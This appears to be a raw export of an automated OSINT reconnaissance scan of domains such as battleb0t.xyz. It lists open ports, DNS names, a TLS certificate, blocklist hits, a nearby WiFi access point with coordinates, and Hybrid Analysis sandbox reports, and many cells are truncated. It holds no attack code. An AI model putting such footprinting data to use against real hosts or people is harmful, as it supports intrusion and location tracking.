3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": "https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "dagcmkpagjlhakfdhnbomgmjdpkdklff": {"rating": 2.7953382, "users": 2000000, "platform": "", "short_description": "Fast, convenient import of references and PDFs to your Mendeley Reference Manager library.", "icon": "https://lh3.googleusercontent.com/n-KR5-ddPVwU7aEkQYUzyQ1di71jI51yOcMuDD-HBBzRxUSEoS1lie5K8Jydhj5pye21D-OOJqneqn0lB-IFxcoV=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1759, "name": "Mendeley Web Importer"}, "ljflmlehinmoeknoonhibbjpldiijjmm": {"rating": 4.430087, "users": 1000000, "platform": "", "short_description": "Read aloud any Google Doc, PDF, webpage, or book with text to speech (TTS). 
Natural sounding voices in 30+ languages & 130 voices.", "icon": "https://lh3.googleusercontent.com/aQsKQj8i_4KJsxjKTAzn_ACwmtVbM_p6Mxvh9LDlO-6dcScpIZqQUUxdztFPK0Ftgz7L2yTE6g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8482, "name": "Speechify Text to Speech Voice Reader"}, "flliilndjeohchalpbbcdekjklbdgfkk": {"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you can easily get back to them later.", "icon": "https://lh3.googleusercontent.com/RHxJoFYLUtCLDgNV64uYMTgTu6NeJpmyV5zAGPcm2H7-WeKEDiDjOsbmpCHhTwhqishCR70OZgXUBWXiyimTTRP7=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 9559, "name": "Pinterest Save Button"}, "noaijdpnepcgjemiklgfkcfbkokogabh": {"rating": 4.390603, "users": 1000000, "platform": "", "short_description": "Translator, Dictionary, Voice", "icon": "https://lh3.googleusercontent.com/5BdJZ8RtA9D8gzY63BejGvZ7Av5RX0iYXYJ0Gv8yoXwK0Qs4vQvafb7eEmfknWvQVU6zGsDw7cs-hxvBJkpuW4Go=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4959, "name": "ImTranslator: Translator, Dictionary, TTS"}, "aapbdbdomjkkjkaonfhkkikfgjllcleb": {"rating": 4.349156, "users": 10000000, "platform": "", 
"short_description": "View translations easily as you browse the web. By the Google Translate team.", "icon": "https://lh3.googleusercontent.com/3ZU5aHnsnQUl9ySPrGBqe5LXz_z9DK05DEfk10tpKHv5cvG19elbOr0BdW_k8GjLMFDexT2QHlDwAmW62iLVdek--Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 42113, "name": "Google Translate"}, "ihcjicgdanjaechkgeegckofjjedodee": {"rating": 4.053508, "users": 9000000, "platform": "", "short_description": "The fastest and safest web browsing experience.", "icon": "https://lh3.googleusercontent.com/UZPt17v_WaxXDY5u3x8NTx-hQmNVGmOaPSANAWNirF_moQIRGBbRBtKzjl07YWUDlRwGyYUtORJxH7zbgqStxU6utOQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 841, "name": "Malwarebytes Browser Guard"}, "dhdgffkkebhmkfjojejmpbldmpobfkfo": {"rating": 4.7285094, "users": 10000000, "platform": "", "short_description": "The world's most popular userscript manager", "icon": "https://lh3.googleusercontent.com/zoY8FwoOqPlBgFxcmFdNSK2Q4CcLmv-gw7vTjF2KMR9cEabwBsGNrHBTEMitn0Ba6OmCVJ0NcLnFGu3N97BP8Phu0g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 70345, "name": "Tampermonkey"}, "kbmfpngjjgdllneeigpgjifpgocmfgmb": {"rating": 4.7316957, "users": 1000000, "platform": "", "short_description": "A suite of modules that enhance your Reddit browsing experience", "icon": "https://lh3.googleusercontent.com/0SvxWpFT-d9CLNWqKIjV7_2jOtnBpU8tXCPPqWTr_MvlaFkKlAm5CDpo1uDX1SXWVnrrninjuGsjhF02MDVHWXb3=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4234, "name": "Reddit Enhancement Suite"}, "ohlencieiipommannpdfcmfdpjjmeolj": {"rating": 4.356376, "users": 1000000, "platform": "", "short_description": "Print Friendly and PDF any Webpage", "icon": "https://lh3.googleusercontent.com/Qg5OD-OnjHXNseuZny1yLGGLdzUjUpxxwf0WHcN28yfpxoOFn17i6a4JIihquQxUA4pp58-UFuiJdEvcIYgdGvDvgw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2329, "name": "Print Friendly & PDF"}, "ndnaehgpjlnokgebbaldlmgkapkpjkkb": {"rating": 4.4497366, "users": 2000000, "platform": "", "short_description": "Email tracker for 
Gmail & Mail Merge with over 2 million active users. Free and unlimited email tracking.", "icon": "https://lh3.googleusercontent.com/-Qbe0s3I6huZBX4FZbwghJS-NQhR92K0HFmkcz9XxzDYrEjLq4Ig_xKbDk-Jrh2JhSZA5kwJYC74NXcWFEIDeBHH=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11191, "name": "Email Tracker for Gmail, Mail Merge-Mailtrack"}, "cmeakgjggjdlcpncigglobpjbkabhmjl": {"rating": 4.101554, "users": 1000000, "platform": "", "short_description": "Improving Steam. Items auto-selling. Lowest prices for games and items. Prices from different sources. And a lot more", "icon": "https://lh3.googleusercontent.com/CadrS32EDKBEsKQlULmRC8QFkSwq3Cht4KLP86K6zgeaeJIVipdaQyLAv-UIyi63qFx8GbvnvrptvmxBtfSecWGV-g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8882, "name": "Steam Inventory Helper"}, "caljgklbbfbcjjanaijlacgncafpegll": {"rating": 3.9023256, "users": 5000000, "platform": "", "short_description": "Avira Password Manager saves, manages, and syncs all your passwords across all your d | ayhu.xyz |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2091 | 87.248.157.102 |
| 2023-05-12 02:45:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 24, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://185.199.111.153/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6108:304:WilStaging_02"\n "SM0:6108:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6108:120:WilError_01"\n "SM0:6108:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "138.91.254.96:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET / HTTP/1.1\nHost: 185.199.111.153\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "githubstatus.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, 
Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file 
"\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\nurturing\\campaign_history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\top sites"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge shopping\\2.0.2353.0\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge shopping\\2.0.2353.0\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sessions\\tabs_13322933142474011"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\shopping.js]- [targetUID: 00000000-00004160]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00004160]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource 
Filter\\Indexed Rules\\35\\scoped_dir4160_527063389\\Ruleset Data]- [targetUID: 00000000-00004160]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00004160]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4160_1524879678\\edge_driver.js]- [targetUID: 00000000-00004160]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\edge_driver.js]- [targetUID: 00000000-00004160]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00004160]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4160_246087038\\Filtering Rules]- [targetUID: 00000000-00004160]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004160]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4160_1524879678\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004160]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004160]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\product_page.js]- [targetUID: 00000000-00004160]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004160]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\4160_650092276\\auto_open_controller.js]- [targetUID: 00000000-00004160]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4160_1524879678\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00004160]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Locat | 185.199.111.153 |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:443 | 188.114.96.0/24 |
| 2023-05-12 03:04:07 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [207.154.224.0/20] https://blocklist.greensnow.co/greensnow.txt | 207.154.224.0/20 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01100111-01101001-01110100.github.io | 185.199.111.153 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United Kingdom | Hounslow, England, TW3, United Kingdom, Europe |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | route1.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bupet (Net ID: 00:12:BF:37:56:6B) | 40.2024, 29.0398 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:83:25:66:25:1a:3d:8f:56:ff:c6:08:d8:7f:3e:06:71:b1:
38:70:e3:fc:72:2a:2d:17:39:ae:84:7f:28:90:6f:b9:3a:53:
70:c6:b9:f9:5c:8e:b6:f6:c9:24:b6:77:0f:70:91:82:5f:ac:
56:6c:08:4c:23:f5:3c:83:00:83:99:51:65:02:cf:77:c0:85:
ba:ab:a0:9d:95:f2:a4:6b:60:04:68:4d:ab:64:a5:39:13:18:
4b:22:b6:3e:90:a8:e1:cb:6c:80:ed:eb:e8:db:09:6d:7d:c5:
d7:7c:4e:0f:11:9f:9c:8c:8f:a2:2c:66:4c:ea:1f:42:07:c6:
45:55:f4:95:f7:e4:07:4c:aa:76:9c:20:37:d5:34:08:5d:ee:
e2:cf:d2:d6:c0:28:79:06:9f:80:f2:b4:81:17:70:24:de:d7:
df:3a:1c:d8:39:dc:4e:be:14:64:a2:ac:e4:0d:fd:e2:26:1c:
5b:a9:79:86:45:3c:74:3c:8d:5c:cc:03:b8:49:29:86:da:6b:
96:13:a0:71:5d:33:3b:08:b4:30:d2:63:d3:44:80:84:2e:62:
2f:23:c8:e2:cd:24:db:22:f1:8a:aa:49:97:34:12:ee:76:9f:
d2:2b:73:15:a1:ca:90:11:c4:27:df:87:b0:88:a3:ea:c8:db:
d6:03:72:a5
|
| 2023-05-12 02:49:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ibm.github.io/mainframe-downloads/eclipse-tools.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3156"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_IE_EarlyTabStart_0xeec_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_ConnHashTable<3156>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c54_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c54_IESQMMUTEX_0_331"\n "IsoScope_c54_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c54_ConnHashTable<3156>_HashTable_Mutex"\n "IsoScope_c54_IESQMMUTEX_0_303"'}, {u'category': u'General', 
u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ibm.github.io"\n "idaas.iam.ibm.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "dashicons.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "grid-fluid_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "tab-dropdown_1_.js" has type "ASCII text"- [targetUID: N/A]\n "masonry_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_A9875CFF-B9D1-11ED-A600-080027F3E993_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "A0JYLFGW.txt" has type "ASCII text with very long lines"- 
Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A0JYLFGW.txt]- [targetUID: 00000000-00002876]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "tables_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "dyntabs_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "www_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "datepicker.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mainframe_1_.js" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "style_1_1_.css" has type "UTF-8 Unicode text"- [targetUID: N/A]\n "www_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "wp-emoji-release.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "usen-utf8_1_.js" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cycle.all.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ZOGTV1O1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZOGTV1O1.txt]- [targetUID: 00000000-00002876]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /mainframe-downloads/eclipse-tools.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: ibm.github.io\nDNT: 1\nConnection: Keep-Alive"\n "r#G(_vFn&@dD"KRKLhUT^Hzdvau?c62?p~a#y2Y 
